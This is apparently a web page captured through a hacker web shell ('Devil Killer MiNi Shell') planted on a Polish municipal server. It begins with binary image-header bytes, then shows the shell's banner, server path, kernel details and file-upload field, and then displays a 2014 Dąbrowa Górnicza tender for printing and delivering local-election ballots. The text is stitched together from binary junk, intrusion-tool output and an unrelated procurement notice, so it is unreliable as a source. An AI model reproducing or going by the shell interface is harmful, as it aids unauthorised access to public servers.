JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141009/213571-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Skład, wydruk, pakowanie i dostarczenie kart do głosowania w wyborach do organów samorządowych w 2014 roku</b><br>
<b>Numer ogłoszenia: 213571 - 2014; data zamieszczenia: 09.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Skład, wydruk, pakowanie i dostarczenie kart do głosowania w wyborach do organów samorządowych w 2014 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907 z późn. zm.).
Przedmiotem zamówienia jest skład, wydruk, pakowanie i dostarczenie kart do głosowania w wyborach do organów samorządowych w 2014 roku.

1. Zamówienie obejmuje świadczenie następujących usług: 
1.1. dla pierwszej tury głosowania:
1.1.1. karty do głosowania na radnych:
Skład i wydrukowanie kart do głosowania na radnych w OKRĘGACH Nr 1, 2, 3, 4 i 5 w wyborach do Rady Miejskiej      w Dąbrowie Górniczej (zwanych dalej kartami) według dostarczonych przez Zamawiającego wzorów kart z odciskiem pieczęci Miejskiej Komisji Wyborczej - do wykonania diapozytywów i matryc drukarskich ze spełnieniem warunków dotyczących druku, o których mowa w pkt. 2.1.1.

1.1.2. karty do głosowania na Prezydenta Miasta
Skład i wydrukowanie kart do głosowania na Prezydenta Miasta Dąbrowy Górniczej (zwanych dalej kartami) według dostarczonego przez Zamawiającego wzoru karty z odciskiem pieczęci Miejskiej Komisji Wyborczej - do wykonania diapozytywów i matryc drukarskich ze spełnieniem warunków dotyczących druku, o których mowa w pkt. 2.1.2.

1.2. dla drugiej tury głosowania:
W przypadku II tury wyborów Prezydenta Miasta Dąbrowy Górniczej zarządzonej przez Miejską Komisję Wyborczą Wykonawca wykona skład i wydrukuje karty do głosowania na Prezydenta Miasta Dąbrowy Górniczej (zwane dalej kartami) według dostarczonego wzoru karty z odciskiem pieczęci Miejskiej Komisji Wyborczej - do wykonania diapozytywów i matryc drukarskich ze spełnieniem warunków dotyczących druku, o których mowa w pkt. 2.2
2. Warunki dotyczące druku kart do głosowania:
2.1. dla pierwszej tury głosowania:
2.1.1. karty do głosowania na radnych w OKRĘGACH Nr 1, 2, 3, 4 i 5:
- nakład kart do głosowania: min. 81 482 sztuk, w tym kart stosowanych w głosowaniu korespondencyjnym - liczba sztuk zostanie podana w dniu podpisania umowy (największy możliwy zakres nakładu z uwzględnieniem prawa opcji: max. 101 852 sztuk) - dokładna liczba kart do głosowania dla każdego okręgu i obwodu wyborczego została określona w zał. nr 6 do SIWZ Rozdzielnik kart do głosowania
- liczba stron karty do głosowania: Okręg Nr 1 - 7 str., Okręg Nr 2 - 7 str., Okręg Nr 3 - 7 str., Okręg Nr 4 - 6 str., Okręg Nr 5 - 6 str.
- karta w prawym górnym rogu ma wycięty otwór o śr. 8 mm
- format kart: A4
- druk w kolorze czarnym, jednostronny, karta składa się z odpowiedniej liczby zadrukowanych jednostronnie, zbroszurowanych i trwale połączonych kart formatu A4
- papier offsetowy 70 lub 80 g/m2 w kolorze białym

2.1.2. karty do głosowania na Prezydenta Miasta:
- nakład kart do głosowania: min. 81 482 sztuk,  w tym kart stosowanych w głosowaniu korespondencyjnym - liczba sztuk zostanie podana w dniu podpisania umowy (największy możliwy zakres nakładu z uwzględnieniem prawa opcji: max. 101 852 sztuk) - dokładna liczba kart do głosowania dla każdego obwodu wyborczego została określona w zał. nr 6 do SIWZ Rozdzielnik kart do głosowania
- karta w prawym górnym rogu ma wycięte cztery umiejscowione w pionie otwory o śr. 8 mm lub ścięty prawy górny róg
- format kart: A4
- druk w kolorze czarnym, jednostronny
- papier offsetowy 70 lub 80 g/m2 w kolorze różowym (może być jednostronnie różowy na stronie drukowanej)

2.2. dla drugiej tury głosowania - karty do głosowania na Prezydenta Miasta:
- nakład kart do głosowania: max. 101 852 sztuk, w tym kart stosowanych w głosowaniu korespondencyjnym - liczba sztuk zostanie podana w dniu podpisania umowy (największy możliwy zakres nakładu z uwzględnieniem prawa opcji) - dokładna liczba kart do głosowania dla każdego obwodu wyborczego została określona w zał. nr 6 do SIWZ Rozdzielnik kart do głosowania
- karta w prawym górnym rogu ma wycięty otwór o śr. 8 mm lub ścięty prawy górny róg
- format kart: A5
- druk w kolorze czarnym, jednostronny,
- orientacja karty - pozioma
- papier offsetowy 70 lub 80 g/m2 w kolorze różowym (może być jednostronnie różowy na stronie drukowanej)

3. Zamawiający przewiduje możliwość zastosowania prawa opcji, w związku z czym Zamawiający:
a) gwarantuje wykonanie usługi w zakresie składu oraz druku kart do głosowania na radnych i Prezydenta Miasta Dąbrowy Górniczej dla pierwszej tury głosowania w ilościach minimalnych (minimalny nakład),
b) część zamówienia, która będzie realizowana w ramach opcji obejmuje: 
-  skład oraz druk kart do głosowania na radnych i Prezydenta Miasta Dąbrowy Górniczej dla pierwszej tury głosowania w ilościach przekraczających ilości minimalne (minimalny nakład), o których mowa  w ppkt. a), z zastrzeżeniem, że ilości opcjonalne nie mogą wyższe niż ilości maksymalne (maksymalny nakład) - termin realizacji odpowiednio do 4 listopada 2014 r. i 12 listopada 2014 r.;
- skład oraz druk kart do głosowania na Prezydenta Miasta Dąbrowy Górniczej dla drugiej tury głosowania, ilości opcjonalne nie mogą wyższe niż ilość maksymalna (maksymalny nakład) - termin realizacji odpowiednio do 20 listopada 2014 r. i do 26 listopada 2014 r.;
c) ilości minimalne oraz maksymalne, które stanowią opcję są określone powyżej w pkt. 3.3.2. SIWZ oraz w zał. nr 6 do SIWZ.
3.1. Zamawiający skorzysta z prawa opcji w przypadku:
- gdy po dokonanych ustaleniach okaże się, że faktyczna liczba wyborców jest większa niż wskazana minimalna ilość kart do głosowania lub wystąpi zdarzenie nadzwyczajne,
- potrzeby zorganizowania drugiej tury wyborów Prezydenta Miasta.
3.2. Realizacja opcjonalnej części zamówienia będzie następować po złożeniu przez Zamawiającego oświadczenia woli faksem lub pocztą elektroniczną (e-mail), w którym określi nakład kart do głosowania objęty prawem opcji.
3.3. Realizacja opcjonalnej części zamówienia będzie odbywać się w oparciu o ceny jednostkowe zadeklarowane przez Wykonawcę w Formularzu ofertowym (zał. nr 1 do SIWZ).
3.4. Zasady dotyczące realizacji przedmiotu zamówienia stanowiącego opcję są jednakowe, jak dla zamówienia podstawowego.
3.5.  Część przedmiotu zamówienia stanowiąca opcję będzie realizowana w ilościach zgodnych z potrzebami Zamawiającego.
3.6.Zamawiający informuje, że realizacja części zamówienia objętego opcją jest wyłącznie uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać.

4. Karty do głosowania muszą być zgodne z wytycznymi, wzorami i warunkami technicznymi określonymi w uchwale Państwowej Komisji Wyborczej z dnia 11 sierpnia 2014 r. wraz z załącznikiem nr 2, nr 6, nr 8, nr 9 do wskazanej powyżej uchwały  (zał. nr 8 do SIWZ) oraz uchwale Państwowej Komisji Wyborczej z dnia 18 sierpnia 2014 r. (zał. nr 9 do SIWZ).

5. Terminy wykonania poszczególnych zadań z uwzględnieniem czynności związanych ze składem, drukiem oraz dostarczeniem kart do siedziby Zamawiającego określa harmonogram prac - zał. nr 7 do SIWZ. Terminy określone              w harmonogramie są terminami ostatecznymi na realizację poszczególnych prac, których Wykonawca będzie bezwzględnie wymagał. W przypadku nie dotrzymania któregokolwiek z terminów Zamawiający nałoży na Wykonawcę karę umowną zgodnie z § 7 ust. 4 lit c) umowy. W dniach upływu terminów określanych w harmonogramie Wykonawca będzie informował Zamawiającego o zaawansowaniu wykonania zaplanowanych prac.

5.1. Zgodnie z harmonogramem prac stanowiącym zał. nr 7 do SIWZ karty do głosowania przeznaczone do sporządzenia pakietów wyborczych stosowanych w głosowaniu korespondencyjnym muszą być wykonane i dostarczone do siedziby Zamawiającego do 4 listopada 2014 r., pozostała część nakładu kart dla pierwszej tury głosowania winna być wykonana i dostarczona do siedziby Zamawiającego do 12 listopada 2014 r. (karty te nie mogą się różnić treścią ani w żaden inny sposób od karty do głosowania przeznaczonych do sporządzenia pakietów wyborczych). Karty do głosowania w przypadku potrzeby zorganizowania drugiej tury wyborów Prezydenta Miasta muszą być wykonane                   i dostarczone do siedziby Zamawiającego w przypadku kart do głosowania przeznaczonych do sporządzenia pakietów wyborczych stosowanych w głosowaniu korespondencyjnym do 20 listopada 2014 r., pozostała część nakładu kart dla drugiej tury głosowania winna być wykonana i dostarczona do siedziby Zamawiającego do 26 listopada 2014 r. (karty te nie mogą się różnić treścią ani w żaden inny sposób od karty do głosowania przeznaczonych do sporządzenia pakietów wyborczych).

6. Treść kart do głosowania dla pierwszej tury głosowania zostanie przekazana Wykonawcy w dniu podpisania umowy.

7. Wprowadza się następujące zasady kontroli druku kart - do bezwzględnego przestrzegania:
a) korektę składów kart do głosowania w zakresie zgodności z ustaloną treścią karty i jej wzorem prowadzą dwa niezależnie od siebie działające zespoły wyznaczonych pracowników urzędu  miasta, odpowiednio do rodzaju kart do głosowania.
b) stwierdzone błędy oba zespoły wzajemnie konfrontują i przekazują Wykonawcy (kierownikowi drukarni), zatrzymując po 1 egz. odbitki każdej karty. Po usunięciu błędów, zespoły dokonują ponownego sprawdzenia kart do głosowania na podstawie materiału wyjściowego, tj. ustalonej treści karty;
c) ostatecznej kontroli składu każdej karty do głosowania dokonują wyznaczeni członkowie terytorialnej komisji wyborczej, którzy zezwalają na uruchomienie druku pełnego nakładu karty, wspólnie podpisując kartę do druku.

8. Wydrukowane karty do głosowania należy zapakować w odrębne paczki dla każdego z 67 obwodów głosowania i odpowiadających im okręgów zgodnie ze wskazaną przez Zamawiającego liczbą kart dla każdego z obwodów. Wykonawca winien utworzyć wydzielony zbiór paczek dla wszystkich 67 obwodów w podziale na karty do głosowania na radnych i karty do głosowania na prezydenta.
8.1.Maksymalny ciężar pojedynczej paczki z zapakowanymi kartami nie może przekroczyć 10 kg.
8.2. Oznaczenie paczki dla każdego z 67 obwodów głosowania:
KARTY DO GŁOSOWANIA
Wybory Rady Miasta Dąbrowa Górnicza
Okręg wyborczy nr ....
Obwód głosowania nr ...
Liczba kart do głosowania - ...
Paczka nr ....z .... paczek
Podpis pakującego ....
i 
KARTY DO GŁOSOWANIA
Wybory Prezydenta Miasta Dąbrowa Górnicza
Obwód głosowania nr ...
Liczba kart do głosowania - ...
Paczka nr .... z ...paczek
podpis pakującego ...

8.3.	Informację o liczbie kart w paczkach i o oznaczeniu poszczególnych paczek Zamawiający dostarczy Wykonawcy nie później niż w dniu rozpoczęcia druku kart. Informacje te zostaną przygotowane w formie wydruku informatycznego, co umożliwi wykonanie etykietek dla poszczególnych paczek.
8.4.	Paczki z kartami winny być zapakowane w podwójny pakowy papier i opasane na krzyż plastikową taśmą lub sznurkiem. Paczki muszą być zapakowane w taki sposób i przy użyciu takich materiałów, które uniemożliwiają wysypanie się lub uszkodzenie ich zawartości w czasie transportu (min. usztywnione z dołu i z góry).
8.5.	Wykonawca dostarczy wydrukowane i spakowane karty do miejsca odbioru tj. siedziby Zamawiającego (Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21)  w dniu wskazanym przez Zamawiającego (wg harmonogramu prac Załącznik nr 7 do SIWZ).

9. Szczególne warunki wykonywania zamówienia:
9.1.Wykonawca obowiązany jest do zachowania najwyższej staranności przy zabezpieczeniu kart do głosowania przed ich utratą bądź zniszczeniem w procesie produkcji, magazynowania i transportu.
9.2.Wykonawca zobowiązany jest podać w Formularzu ofertowym dokładny adres  drukarni, w której karty będą drukowane oraz dokładny adres miejsca, gdzie karty będą pakowane i magazynowane;
9.3.Wykonawca umożliwi osobom upoważnionym przez Zamawiającego wstęp do drukarni i obserwowanie prac związanych z drukiem, pakowaniem i magazynowaniem kart.
9.4.Na Wykonawcy (w ramach wynagrodzenia) będzie spoczywał obowiązek dostarczania do siedziby Zamawiającego, a także odbierania w siedzibie Zamawiającego, wzorów kart, treści kart, informacji i innych dokumentów niezbędnych dla wykonania zamówienia.
9.5.Wykonawca zobowiązuje się do magazynowania i chronienia z należytą starannością wszelkiej nadwyżki wydrukowanych kart do głosowania a także makulatury powstałej w procesie technologicznym druku do czasu uzyskania zgody na zniszczenie przez Zamawiającego. Zobowiązanie to dotyczy również nośników elektronicznych, płyt drukarskich, matryc i innych materiałów mających bezpośrednio wpływ na treść i nakład kart.
9.6.Wykonawca zobowiązuje się uwzględniać zmiany w treści kart do głosowania wynikłe z uchwał Państwowej Komisji Wyborczej oraz Miejskiej Komisji Wyborczej w Dąbrowie Górniczej. Zmiany te winne być bezwzględnie realizowane przez Wykonawcę do chwili rozpoczęcia fazy druku.
9.7.Wykonawca zobowiązany jest do zorganizowania dyżuru w drukarni w dniach 15-16 listopad 2014 r., tj. w przeddzień wyborów i w dniu głosowania, w godzinach od 6.00 do 20.00 umożliwiającego ewentualny dodruk kart do głosowania             i dostarczenia do wyznaczonego przez Zamawiającego miejsca w czasie nie dłuższym niż 5 godzin od złożenia zlecenia drogą faksową lub drogą elektroniczną.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art. 67 ust.1 pkt. 6 Ustawy.
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia. Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 20% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1.1. w zakresie zmiany terminów realizacji przedmiotu umowy w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, np. warunki atmosferyczne.
1.2. w pozostałym zakresie zmiany do umowy mogą dotyczyć:
a)	zmiany przepisów prawa istotnych dla postanowień zawartej umowy, 
b)	zmiany stawki podatku VAT :
- w przypadku zwiększenia stawki podatku VAT - wynagrodzenie brutto oraz ceny jednostkowe brutto nie mogą być wyższa niż zadeklarowane w ofercie przez cały okres obowiązywania umowy. Maksymalna nominalna wartość umowy nie ulegnie zmianie  w okresie obowiązywania umowy,
- w przypadku zmniejszenia stawki podatku VAT wynagrodzenie brutto oraz ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do ceny zadeklarowanej w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu;
2. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
3.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
4. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
5. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 5 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
